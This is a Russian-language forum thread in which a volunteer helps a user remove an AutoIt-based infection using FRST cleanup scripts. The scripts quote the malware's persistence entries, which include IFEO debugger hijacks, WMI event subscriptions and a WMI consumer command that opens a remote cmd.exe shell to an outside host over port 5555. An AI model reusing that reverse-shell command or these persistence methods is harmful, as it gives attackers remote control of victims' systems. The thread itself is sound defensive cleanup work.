[РЕШЕНО] Autoit v3 Script вирус

[Crossbean]

Доброго времени суток. Autoit v3 Script вирус подгружает систему на процентов 25. Открыть его расположение невозможно. При полноэкранном режиме в играх вылетает на мгновение командная строка и сразу закрывается.

Addition_03-10-2024 23.41.20.txt FRST_03-10-2024 23.41.20.txt

[safety]

Все логи необходимы по правилам.

«Порядок оформления запроса о помощи».

-------------------

по очистке в FRST выполните скрипт:

 

 

Выполните скрипт очистки в FRST

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда FRST будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт очистит систему, и завершит работу с перезагрузкой системы

 

Start::
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore: [DisableConfig] Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR] Ограничение <==== ВНИМАНИЕ
IFEO\MicrosoftEdgeUpdate.exe: [Debugger] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
IFEO\svchost.exe: [GlobalFlag] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
2024-09-13 09:22 - 2024-09-13 09:22 - 000000000 _RSHD C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
2024-09-13 09:22 - 2024-09-13 09:22 - 000000000 ____D C:\ProgramData\NUL..
2024-09-13 09:22 - 2024-09-13 09:22 - 000000000 ____D C:\ProgramData\AUX..
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"pers\"",Filter="__EventFilter.Name=\"pers\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"nut\"",Filter="__EventFilter.Name=\"nut\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"per\"",Filter="__EventFilter.Name=\"per\"::
WMI:subscription\__EventFilter->nut::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->per::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->pers::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\CommandLineEventConsumer->nut::[CommandLineTemplate => C:\ProgramData\NUL..\StartMenuExperienceHost.exe --ssl gamesjumpers.com 5555 -e cmd.exe]
WMI:subscription\CommandLineEventConsumer->per::[CommandLineTemplate => C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat][ExecutablePath => C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat]
WMI:subscription\CommandLineEventConsumer->pers::[CommandLineTemplate => C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\DeviceId.dll]
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\Users\cross\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\cross\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Public\desktop.ini:WinDeviceId [64]
Reboot::
End::

после перезагрузки:

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение

Изменено 4 октября пользователем safety

[Crossbean]

Fixlog.txt

[safety]

Для вашей системы Windows 10 Pro Версия 22H2

по данной ссылке

скачайте соответствующие твики (reg файлы) для исправления работы служб:

BITS

dosvc

UsoSvc

WaaSMedicSvc

wuauserv

Далее, выполните по отдельности каждый твик от имени Администратора и перегрузите систему.

 

Далее необходимо очистить скриптом в FRST нежелательные службы, оставшиеся после вирусной активности

 

Start::
S3 BITS_bkp; C:\WINDOWS\System32\qmgr.dll [1481728 2024-05-16] (Microsoft Windows -> Microsoft Corporation)
S2 UsoSvc_bkp; C:\WINDOWS\system32\usosvc.dll [573952 2024-09-11] (Microsoft Windows -> Microsoft Corporation)
S3 WaaSMedicSvc_bkp; C:\WINDOWS\System32\WaaSMedicSvc.dll [427520 2024-09-11] (Microsoft Windows -> Microsoft Corporation)
S3 wuauserv_bkp; C:\WINDOWS\system32\wuaueng.dll [3431936 2024-08-15] (Microsoft Windows -> Microsoft Corporation)
Reboot::
End::

После перезагрузки проверяем работу системы, напишите по результату, решены были проблемы, или что еще осталось.

+ добавьте новые логи FRST для контроля.

Изменено 4 октября пользователем safety

[Crossbean]

Все работает. БлагодарюFixlog.txt

[safety]

Хорошо,

Эту строку еще надо дочистить в FRST без перезагрузки:

 

Start::
S2 dosvc_bkp; C:\WINDOWS\system32\dosvc.dll [1533952 2024-08-15] (Microsoft Windows -> Microsoft Corporation)
End::

+

завершающие шаги:

 

    Загрузите SecurityCheck by glax24 & Severnyj, https://safezone.cc/resources/security-check-by-glax24.25/ сохраните утилиту на Рабочем столе и извлеките из архива.
    Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
    Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
    Прикрепите этот файл к своему следующему сообщению.

 

Изменено 7 октября пользователем safety

[safety]

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в Турцию, Армению, Сочи, Камбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".